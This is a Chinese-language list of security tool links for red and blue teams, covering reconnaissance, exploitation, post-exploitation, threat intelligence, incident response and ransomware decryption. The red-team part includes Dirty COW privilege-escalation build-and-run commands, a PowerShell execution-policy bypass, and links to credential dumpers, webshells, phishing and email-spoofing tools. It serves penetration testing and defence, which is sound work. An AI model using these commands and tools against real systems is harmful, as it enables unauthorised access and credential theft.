红队
前
信息收集
https://chrome.zzzmh.cn/info?token=gppongmhjkpfnbhagpmjfkannfbllamg Wappalyzer(chrome网站分析插件)
https://www.whatruns.com/ Web指纹识别
https://github.com/Ekultek/WhatWaf 防火墙识别
https://github.com/r0eXpeR/redteam_vul 红队指纹
https://github.com/skskevin/PortScan
https://github.com/shadow1ng/fscan 扫描
https://www.exploit-db.com/ 漏洞数据库
https://www.exploit-database.net/ 漏洞数据库2
https://github.com/lz520520/railgun 渗透工具
https://github.com/gobysec/Goby 扫描工具(梳理资产暴露攻击面)
https://github.com/projectdiscovery/ 企业外网资产收集
https://github.com/rtcatc/Packer-Fuzzer Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具
https://github.com/chaitin/xray 长亭Xray
https://github.com/maurosoria/dirsearch Dirsearch(扫目录)
https://github.com/H4ckForJob/dirmap Dirmap(扫目录)
https://github.com/Tuhinshubhra/CMSeeK CMS识别
http://whatweb.bugscaner.com/look/ 在线cms指纹识别
https://github.com/shmilylty/OneForAll 子域收集工具
https://github.com/lijiejie/subDomainsBrute subdomainsbtute(子域)
https://github.com/BugScanTeam/GitHack Git泄露
https://github.com/kost/dvcs-ripper 常规信息泄露
https://github.com/TheKingOfDuck/fuzzDicts fuzzdb
https://github.com/1N3/IntruderPayloads fuzzdb
https://github.com/TheKingOfDuck/easyXssPayload XssPayload
MD5
http://www.xmd5.org/index_cn.htm
漏洞检测攻击
https://github.com/SafeGroceryStore/MDUT 数据库利用工具
https://github.com/Macr0phag3/email_hack 钓鱼邮件
https://emkei.cz/ 伪造邮件
https://github.com/brendan-rius/c-jwt-cracker jwt伪造
https://github.com/feihong-cs/ShiroExploit Shiro 反序列化
https://github.com/feihong-cs/ShiroExploit-Deprecated Shiro 反序列化2
https://github.com/dionach/CMSmap CMS漏洞检测工具
https://github.com/chenjj/CORScanner 扫描CORS配置漏洞
https://github.com/deathmarine/Luyten/releases/ Luyten反编译工具(jar包)
https://github.com/opensec-cn/vtest VTest - 漏洞测试辅助系统
https://github.com/meizjm3i/PHPVulFinder PHP代码静态自动化审计工具
https://github.com/sveinbjornt/Platypus Platypus - 多会话交互式主机管理工具
https://dig.pm/ DNSLOG
后
主机存活扫描
nbtscan.exe:nbtscan 192.168.1.1/20
arp-scan.exe:arp-scan.exe -t 192.168.1.1/24 https://github.com/QbsuranAlang/arp-scan-windows-
ping:for /L %I in (1,1, 254) do @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”
Invoke-ARPScan.ps1: powershell.exe -exec bypass -Command “& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}” >> c:\log.txt
Powershell 渗透测试工具-Nishang https://github.com/samratashok/nishang
cping:cping scan smbvul 10.33.93.1 10.33.93.1
qs.exe:qs alive 192.168.1.1/24
dnsbrute
F-NAScan.py https://github.com/ywolf/F-NAScan
fscan:
https://github.com/shadow1ng/fscan
https://github.com/chaosec2021/fscan-POC
端口扫描
s.exe: s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save
scanline: scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b
Invoke-Portscan.ps1:Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [探测存活 -ResolveHost]
nmap
后渗透
https://i.hacking8.com/tiquan 提权识别
https://www.shentoushi.top/av/av.php 杀软识别
https://github.com/k8gege/Ladon Ladon 7.2
https://github.com/gentilkiwi/mimikatz 密码抓取
https://www.objectif-securite.ch/en/ophcrack 哈希破解
http://cracker.offensive-security.com/index.php 哈希破解
https://github.com/shack2/SNETCracker 超级弱口令检查工具
https://ngrok.com/ 内网穿透1
https://github.com/fatedier/frp 内网穿透2
https://github.com/sensepost/reDuh 内网穿透3
https://github.com/SECFORCE/Tunna 内网穿透4
https://github.com/ehang-io/nps 内网穿透5
https://github.com/esrrhs/spp 内网穿透6
https://github.com/BeichenDream/Godzilla/ 哥斯拉 Webshell
https://github.com/rebeyond/Behinder/ 冰蝎 Webshell
https://github.com/AntSwordProject/AntSword-Loader/releases/tag/4.0.3 蚁剑
https://github.com/FireFart/dirtycow 脏牛提权(cve-2016-5159)
Linux kernel >= 2.6.22 gcc -pthread dirty.c -o dirty -lcrypt 执行./dirty 密码命令,即可进行提权。提权之前可将/etc/passwd备份一下。
https://github.com/dirtycow/dirtycow.github.io 脏牛提权1(cve-2016-5159)
https://github.com/gbonacini/CVE-2016-5195 脏牛提权2(cve-2016-5159)
wget https://github.com/gbonacini/CVE-2016-5195/archive/master.zip unzip master cd CVE-2016-5195-master make ./dcow -s
https://github.com/abatchy17/WindowsExploits 提权漏洞(2017.5)
https://github.com/QAX-A-Team/BrowserGhost 浏览器信息收集
https://github.com/uknowsec/SharpDecryptPwd 主机密码收集工具(Windows)
https://github.com/SecureAuthCorp/impacket Impacket是用于网络协议的Python类的集合
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD disable_function.工具
http://payloads.net/Windows_patch/ Windows辅助提权工具
https://i.hacking8.com/tiquan/ Windows辅助提权工具2
http://blog.neargle.com/win-powerup-exp-index/ Windows辅助提权工具3
linux-exploit-suggester.sh linux提权辅助工具(一)
linux-exploit-suggester-2.pl linux提权辅助工具(二)
privchecker.py linux提权辅助工具(三)
LinEnum.sh linux提权辅助工具(四)
https://github.com/Rvn0xsy/Cooolis-ms 内网管理工具包
https://bashupload.com/ 文件上传共享
https://transfer.sh/ 文件上传共享
域渗透
https://github.com/BloodHoundAD/BloodHound 域用户
https://github.com/SkewwG/domainTools 域渗透小工具
蓝队
威胁情报
https://www.virustotal.com/ VirusTotal
https://ti.qianxin.com/ 奇安信威胁情报
https://ti.360.cn/ 360威胁情报中心
https://www.venuseye.com.cn/ 启明星辰威胁情报
https://redqueen.tj-un.com REDQUEEN
https://poma.nsfocus.com/ 绿盟的威胁分析中心
https://habo.qq.com/ 腾讯哈勃系统
https://mac-cloud.riskivy.com FreeBuf × 漏洞盒子「大圣云沙箱」
在线云沙箱
https://ata.360.cn/detection 360沙箱云
https://s.threatbook.cn/ 微步云沙箱
https://www.virustotal.com/gui/home/upload VirusTotal平台
https://www.maldun.com/submit/submit_file/ 魔盾安全分析平台
https://app.any.run/ Any.Run交互式恶意软件分析平台
溯源
https://www.chaipip.com/ 高精度IP地址查询-查IPIP
https://www.opengps.cn/Data/IP/ipplus.aspx 高精度IP定位
https://www.ipip.net/ip.html ipip反查
http://ip.yqie.com/ ip地址反向查询
http://qd.yyimg.com/act/index/id/ 百度ID反查
https://www.reg007.com/ 注册网站反查
漏洞情报
https://www.secshi.com/circle/qingbao 安全师情报共享
https://www.seebug.org/ seebug
https://nosec.org/home/index/hole.html nosec
空间测绘网站
webshell查杀
应急响应工具
Windows
Autoruns
PCHunter
ProcessDump
processhacker
火绒剑
https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer Process Explorer
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon Process Monitor
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec Psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/tcpview TCPView
https://docs.microsoft.com/zh-cn/sysinternals/downloads/adexplorer Active Directory Explorer
https://goaccess.io/ Access日志分析
Linux
https://github.com/grayddq/GScan Linux主机排查
https://github.com/T0xst/linux Linux 安全检查
勒索病毒搜索网站
【360】 勒索病毒搜索引擎,支持检索超过800种常见勒索病毒
【腾讯】 勒索病毒搜索引擎,支持检索超过 300 种常见勒索病毒
【启明】VenusEye勒索病毒搜索引擎,超300种勒索病毒家族
https://lesuo.venuseye.com.cn/
【奇安信】勒索病毒搜索引擎
https://lesuobingdu.qianxin.com/
【深信服】勒索病毒搜索引擎
勒索软件解密工具集
【腾讯哈勃】勒索软件专杀工具
https://habo.qq.com/tool/index
【金山毒霸】勒索病毒免疫工具
http://www.duba.net/dbt/wannacry.html
【火绒】勒索病毒解密工具集合
http://bbs.huorong.cn/thread-65355-1-1.html
【瑞星】解密工具下载
http://it.rising.com.cn/fanglesuo/index.html
【nomoreransom】勒索软件解密工具集
https://www.nomoreransom.org/zh/index.html
【MalwareHunterTeam】勒索软件解密工具集
https://id-ransomware.malwarehunterteam.com/
【卡巴斯基】免费勒索解密器
https://noransom.kaspersky.com/
【Avast】免费勒索软件解密工具
https://www.avast.com/zh-cn/ransomware-decryption-tools
【Emsisoft】免费勒索软件解密工具
https://www.emsisoft.com/ransomware-decryption-tools/free-download
专杀工具
https://www.qianxin.com/other/qaxvirusremoval 奇安信顽固病毒专杀工具
https://bbs.huorong.cn/thread-18575-1-1.html 火绒恶性木马专杀工具
